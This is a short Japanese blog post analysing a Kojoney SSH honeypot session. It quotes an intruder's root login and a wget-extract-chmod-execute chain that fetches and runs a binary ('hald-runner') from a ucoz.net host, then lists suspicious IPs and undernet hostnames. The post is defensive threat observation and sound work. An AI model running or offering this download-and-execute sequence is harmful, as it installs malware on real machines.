20100627171942
Kojoney 肉入り襲来編
昨日終わりぐらいに早速ロシア製肉入りが現れた模様。 ログの部を抜粋。2010-06-26 23:37:28+0900 [185,89.123.218.182]lsとuname打ってるので人間と判断。とりあえずucoz.netは止めたほうが良さそう。
root authenticated with password
COMMAND IS : w
COMMAND IS : uptime
COMMAND IS : ls
COMMAND IS : uname -a
COMMAND IS : wget arhive.ucoz.net/accesing.log.tgz ;tar zxvf accesing.log.tgz
COMMAND IS : tar zxvf accesing.log.tgz
COMMAND IS : rm -rf accesing.log.tgz
COMMAND IS : cd .acces.log
COMMAND IS : chmod +x *
COMMAND IS : ./hald-runner
COMMAND IS : ./hald-runner
connection lost
ついでにダウンロードしてたものの中身を見てみたら妙な実行ファイルを持っているので拝見。
hald-runner: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),流石汎用。で、内容はファイル構成から推測するとIRCサーバを立てるか、繋ぎにいくものと予想。(IRCコマンドがたくさんあるのだもの('A‘)) とりあえず、今回の収穫として、次のドメイン名/IPアドレスは胡散臭い。
dynamically linked (uses shared libs), for GNU/Linux 2.2.5
94.125.182.255そのまま乗ってるんだもの・・・お粗末様。
38.114.116.5
208.83.20.130
194.109.20.90
64.18.128.86
82.196.213.250
193.109.122.67
angelguard.users.undernet.org
cromat.users.undernet.org
nebuniii.users.undernet.org
complex.users.undernet.org
scaparici.users.undernet.org
